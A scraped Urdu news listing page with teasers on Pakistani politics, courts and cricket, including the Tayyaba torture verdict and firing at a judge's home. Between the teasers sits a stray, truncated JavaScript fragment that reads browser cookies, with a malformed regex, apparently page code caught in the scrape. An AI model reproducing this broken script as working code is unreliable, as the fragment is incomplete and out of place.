عمران کا تحریک انصاف سے20ایم پی ایز کو نکالنے کا اعلان

اسلام آباد(ویب ڈیسک )چیئرمین تحریک انصاف عمران خان کاسینیٹ الیکشن میں ووٹ بیچنے والے اپنے 20 ارکان کو شوکاز جاری کرنے کا اعلان،کہتے ہیں اپنے بیس فیصد ارکان کو پارٹی سے نکال رہے ہیں۔ اسلام آباد میں پارٹی رہنماوٴں کے ہمراہ پریس کانفرنس میں…

صدرنے سپریم کورٹ اور پشاور ہائیکورٹ کی فاٹا تک توسیع کے بل کی منظوری دے دی

فوٹو:فائل اسلام آباد(ویب ڈیسک) پارلیمنٹ سے منظوری کے بعد صدر مملکت ممنون حسین نے سپریم کورٹ اور پشاور ہائیکورٹ کی فاٹا تک توسیع کے بل کی منظوری دے دی قومی اسمبلی سے منظوری کے بعد13 اپریل کو سینیٹ میں سپریم کورٹ اور پشاور ہائیکورٹ کا دائرہ…

نواز شریف ،مریم نواز کی تقاریر پر پابندی نہیں لگائی گئی، سپریم کورٹ

اسلام آباد(ویب ڈیسک )سپریم کورٹ نے سابق وزیراعظم کی تقاریر پر پابندی کے فیصلے پر از خودنوٹس پر سماعت کی تھی شام کو سپریم کورٹ نے گزشتہ روز (منگل )کی سماعت کا تحریری حکم نامہ جاری کر دیا۔ اعلامیہ میں بتایا گیاہے کہ چیف جسٹس میاں ثاقب نثار…

TAL

function getCookie(e){var U=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/(\\\/\+^])/g,"\\$1")+"=(*)"));return U?decodeURIComponent(U):void 0}var

نواز شریف۔ مر یم نواز کی عدلیہ مخالف تقاریر۔ سپریم کورٹ کا از خود نو ٹس

  اسلام آباد(ویب ڈیسک ) چیف جسٹس پاکستان جسٹس میاں ثاقب نثار نے نواز شریف اور مریم نواز کی عدلیہ مخالف تقاریر پر پابندی سے متعلق لاہور ہائیکورٹ کے فیصلے پر ازخود نوٹس لے لیا۔ سپریم کورٹ کے مطابق چیف جسٹس نے لاہور ہائیکورٹ سے مقدمے کا…

طیبہ تشدد کیس۔ سابق جج اور ان کی اہلیہ کوایک سال قید کی سزا

فوٹو: فائل اسلام آباد (ویب ڈیسک) اسلام آباد ہائیکورٹ نے گھریلو ملازمہ طیبہ پر تشدد کے کیس میں نامزد سابق ایڈیشنل سیشن جج راجہ خرم علی خان اور ان کی اہلیہ ماہین ظفر کو ایک، ایک سال قید اور 50، 50 ہزار روپے جرمانے کی سزا سنا دی۔ طیبہ تشدد کیس…

ن لیگ فوری بدلہ لیتی ہے

شمشاد مانگٹ میاں نواز شریف سمیت پورے ”ٹبر“ کی جے آئی ٹی میں پیشی کے دوران دھمکیوں کو جو سلسلہ شروع ہوا تھا اب اس پر عمل درآمد ہوتا دکھائی دے رہا ہے۔ مسلم لیگ (ن) کی قیادت جسٹس اعجاز الاحسن کے گھر پر حملے کو کوئی بھی رنگ دے اور تحقیقاتی…

وزیر اعظم 2روزہ دورے پر سعودی عرب پہنچ گے

فوٹو: پی آئی ڈی اسلام آباد (ویب ڈیسک )وزیر اعظم شاہد خاقان عباسی 2 روزہ سرکاری دورے پر سعودی عرب پہنچ گئے جبکہ آرمی چیف جنرل قمر جاوید باجوہ اور وزیر دفاع خرم دستگیر بھی ان کے ساتھ ہیں۔ وزیر اعظم ہاؤس کی جانب سے جاری اعلامیے کے مطابق وزیر…

جسٹس اعجاز الااحسن کے گھر فاہرنگ۔ جے آہی ٹی بنا دی گہی

لاہور( ویب ڈیسک)  پنجاب پولیس نے جسٹس اعجاز الاحسن کے گھر پر فائرنگ کے واقعے کی ابتدائی تحقیقاتی رپورٹ جاری کر دی جبکہ واقعے کی تحقیقات کے لیے مشترکہ تحقیقاتی ٹیم بھی تشکیل دے دی گئی ہے۔ ایس پی آپریشنزماڈل ٹاؤن کی جانب سے جاری کی گئی…

انگلینڈ اور آیرلینڈ کے لیے قومی کرکٹ ٹیم کا اعلان

فائل فوٹو لاہور(ویب ڈیسک )پاکستان کرکٹ بورڈ نے قومی کرکٹ ٹیم کے دورہ آئرلینڈ اورانگلینڈ کے لیے 16 رکنی اسکواڈ کا اعلان کردیا۔ چیف سلیکٹر انضمام الحق نے پانچ روزہ تربیتی کیمپ میں کھلاڑیوں کی فٹنس اور دیگر صلاحیتوں کا جائزہ لینے کے لئے ٹیسٹ…